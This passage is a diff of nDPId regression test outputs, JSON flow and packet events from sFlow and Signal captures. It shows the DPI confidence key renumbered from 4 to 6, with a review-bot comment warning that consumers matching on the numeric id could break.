-00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"sflow.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1378125488790,"flow_last_seen":1378125507793,"flow_idle_time":200000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":144,"midstream":0,"thread_ts_msec":1378125507793,"l3_proto":"ip4","src_ip":"172.21.35.17","dst_ip":"172.21.35.199","src_port":1027,"dst_port":6343,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"sFlow","breed":"Acceptable","category":"Network"}} +00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"sflow.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1378125488790,"flow_last_seen":1378125507793,"flow_idle_time":200000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":144,"midstream":0,"thread_ts_msec":1378125507793,"l3_proto":"ip4","src_ip":"172.21.35.17","dst_ip":"172.21.35.199","src_port":1027,"dst_port":6343,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"sFlow","breed":"Acceptable","category":"Network"}} 00624{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"sflow.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1378125518792,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":186,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":186,"pkt_l4_len":152,"thread_ts_msec":1378125518792,"pkt":"AFBWlgDZAOCxz5TDCABFAACsIfwAAEARuUKsFSMRrBUjxwQDGMcAmAAAAAAABQAAAAGsFSMRAAAAAQAAAaFnPkxAAAAAAQAAAAIAAABsAAAhJgAABAwAAAABAAAAAQAAAFgAAAQMAAAABgAAAAAF9eEAAAAAAQAAAAMAAAAAAYw+XwAAm4gAApAuAAH2kQAAAAAAAAAAAAAAAAAAAAAAU0E5AACgvgAAIYgAAAjXAAAAAAAAAAAAAAAA"} 
-00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":9,"source":"sflow.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1378125488790,"flow_last_seen":1378125597799,"flow_idle_time":200000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":1324,"flow_avg_l4_payload_len":147,"midstream":0,"thread_ts_msec":1378125597799,"l3_proto":"ip4","src_ip":"172.21.35.17","dst_ip":"172.21.35.199","src_port":1027,"dst_port":6343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"sFlow","breed":"Acceptable","category":"Network"}} +00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":9,"source":"sflow.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1378125488790,"flow_last_seen":1378125597799,"flow_idle_time":200000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":1324,"flow_avg_l4_payload_len":147,"midstream":0,"thread_ts_msec":1378125597799,"l3_proto":"ip4","src_ip":"172.21.35.17","dst_ip":"172.21.35.199","src_port":1027,"dst_port":6343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"sFlow","breed":"Acceptable","category":"Network"}} 00550{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":9,"source":"sflow.pcap","alias":"nDPId-test","packets-captured":9,"packets-processed":9,"total-skipped-flows":0,"total-l4-payload-len":1324,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1378125597799} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets 
captured/processed: 9/9 @@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5869704 bytes -~~ total memory freed........: 5869704 bytes -~~ total allocations/frees...: 118123/118123 +~~ total memory allocated....: 6003338 bytes +~~ total memory freed........: 6003338 bytes +~~ total allocations/frees...: 120885/120885 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 461 chars ~~ json string max len.......: 685 chars diff --git a/test/results/signal.pcap.out b/test/results/signal.pcap.out index a5a3685b7..cd0a618a0 100644 --- a/test/results/signal.pcap.out +++ b/test/results/signal.pcap.out 
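Review bot: The key of the `confidence` object changes from `"4"` to `"6"` for the same `"DPI"` label in both changed events of the sflow.pcap.out hunk (`detected` and `idle`), which suggests the numeric id is taken from a libnDPI enum that the bump renumbered and is therefore not stable across library versions. A consumer or detection rule that matches on the numeric key rather than the name would presumably stop recognising DPI-confirmed flows without raising any error. The commit message does not mention this, so I would add a line such as `confidence ids renumbered upstream (DPI: 4 -> 6); match on the name, not the id`, and repeat it in the event schema or documentation if one exists. The same key change recurs in the signal.pcap.out hunks that follow.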
@@ -2,10 +2,10 @@ 00546{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"signal.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1569051245838} 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"signal.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051245838,"flow_last_seen":1569051245838,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1569051245838,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00847{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"signal.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1569051245838,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":1569051245838,"pkt":"\/\/\/\/\/\/\/\/2DBiVgAcCABFAAFIKS8AAP8RkXYAAAAA\/\/\/\/\/wBEAEMBNJxAAQEGACG6jqoAAQAAAAAAAAAAAAAAAAAAAAAAANgwYlYAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEBNwoBeQMGD3f8XywuOQIF3D0HAdgwYlYAHDMEAHanAAwKTHVjYXMtaU1hY\/8AAAAAAAAAAAAAAAAA"} 
-00730{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"signal.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051245838,"flow_last_seen":1569051245838,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1569051245838,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"lucas-imac","fingerprint":"1,121,3,6,15,119,252,95,44,46","class_ident":""}} +00730{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"signal.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051245838,"flow_last_seen":1569051245838,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1569051245838,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"lucas-imac","fingerprint":"1,121,3,6,15,119,252,95,44,46","class_ident":""}} 
00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"signal.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051247593,"flow_last_seen":1569051247593,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":43,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1569051247593,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":60793,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"signal.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1569051247593,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":85,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":85,"pkt_l4_len":51,"thread_ts_msec":1569051247593,"pkt":"xiwDYGpkxGGLNYKpCABFAABHd8wAAP8RvnbAqAIRwKgCAe15ADUAM\/YJyvgBAAABAAAAAAAABGU2NzMFZHNjZTkKYWthbWFpZWRnZQNuZXQAAAEAAQ=="} -00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"signal.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051247593,"flow_last_seen":1569051247593,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":43,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1569051247593,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":60793,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"e673.dsce9.akamaiedge.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"signal.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051247593,"flow_last_seen":1569051247593,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":43,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1569051247593,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":60793,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"e673.dsce9.akamaiedge.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"signal.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051247594,"flow_last_seen":1569051247594,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569051247594,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":49226,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"signal.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1569051247594,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569051247594,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGZHDAqAIRIuHwrcBKAbtArcPUAAAAALAC\/\/8kVgAAAgQFtAEDAwYBAQgKKFVNgQAAAAAEAgAA"} 
00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"signal.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051247599,"flow_last_seen":1569051247599,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569051247599,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"23.57.24.16","src_port":57018,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
@@ -17,41 +17,41 @@ 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"signal.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051247603,"flow_last_seen":1569051247603,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569051247603,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":57021,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"signal.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1569051247603,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569051247603,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGZHDAqAIRIuHwrd69Abtt2McPAAAAALAC\/\/\/RCgAAAgQFtAEDAwcBAQgKKFVR8gAAAAAEAgAA"} 00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"signal.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1569051247630,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":101,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":101,"pkt_l4_len":67,"thread_ts_msec":1569051247630,"pkt":"xGGLNYKpxiwDYGpkCABFAABXR+wAAEARrUfAqAIBwKgCEQA17XkAQwp5yviBgAABAAEAAAAABGU2NzMFZHNjZTkKYWthbWFpZWRnZQNuZXQAAAEAAcAMAAEAAQAAAA8ABBc5GBA="} 
-00786{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8,"source":"signal.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569051247593,"flow_last_seen":1569051247630,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1569051247630,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":60793,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"e673.dsce9.akamaiedge.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"23.57.24.16"}} +00786{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8,"source":"signal.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569051247593,"flow_last_seen":1569051247630,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1569051247630,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":60793,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"e673.dsce9.akamaiedge.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"23.57.24.16"}} 
00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"signal.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1569051247643,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1569051247643,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAADQGlLoXORgQwKgCEQG73rrg+UqLaJ6n1qAScSCOEgAAAgQFrAQCCAqWTinBKFVR7gEDAwc="} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"signal.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1569051247645,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569051247645,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGSMLAqAIRFzkYEN66AbtonqfW4PlKjIAQBAspvwAAAQEICihVUhuWTinB"} -00892{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"signal.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569051247599,"flow_last_seen":1569051247645,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569051247645,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"23.57.24.16","src_port":57018,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiTunes","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"itunes.apple.com","ja3":"17305a56a62a10f6b0ee8edcc3b1769c","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 
-00933{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":13,"source":"signal.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569051247599,"flow_last_seen":1569051247690,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1569051247690,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"23.57.24.16","src_port":57018,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiTunes","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.3","client_requested_server_name":"itunes.apple.com","ja3":"17305a56a62a10f6b0ee8edcc3b1769c","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00892{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"signal.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569051247599,"flow_last_seen":1569051247645,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569051247645,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"23.57.24.16","src_port":57018,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AppleiTunes","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"itunes.apple.com","ja3":"17305a56a62a10f6b0ee8edcc3b1769c","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 
+00933{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":13,"source":"signal.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569051247599,"flow_last_seen":1569051247690,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1569051247690,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"23.57.24.16","src_port":57018,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AppleiTunes","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.3","client_requested_server_name":"itunes.apple.com","ja3":"17305a56a62a10f6b0ee8edcc3b1769c","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"signal.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1569051247704,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1569051247704,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAAO0G93Mi4fCtwKgCEQG7wEr7fyfqQK3D1aASaN\/uCAAAAgQFrAQCCApkFVboKFVNgQEDAwg="} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"signal.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1569051247706,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569051247706,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGZHzAqAIRIuHwrcBKAbtArcPV+38n64AQCBZ9JQAAAQEICihVTfNkFVbo"} 
-00976{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":22,"source":"signal.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569051247594,"flow_last_seen":1569051247706,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1569051247706,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":49226,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00976{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":22,"source":"signal.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569051247594,"flow_last_seen":1569051247706,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1569051247706,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":49226,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"signal.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1569051247709,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1569051247709,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAAO0G93Mi4fCtwKgCEQG73rtLEL7asq23cqASaN9\/CQAAAgQFrAQCCApkFVbqKFVR7wEDAwg="} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"signal.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1569051247711,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569051247711,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGZHzAqAIRIuHwrd67AbuyrbdySxC+24AQBAsSOAAAAQEICihVUlpkFVbq"} -00906{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":25,"source":"signal.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569051247600,"flow_last_seen":1569051247711,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569051247711,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":57019,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 
+00906{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":25,"source":"signal.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569051247600,"flow_last_seen":1569051247711,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569051247711,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":57019,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 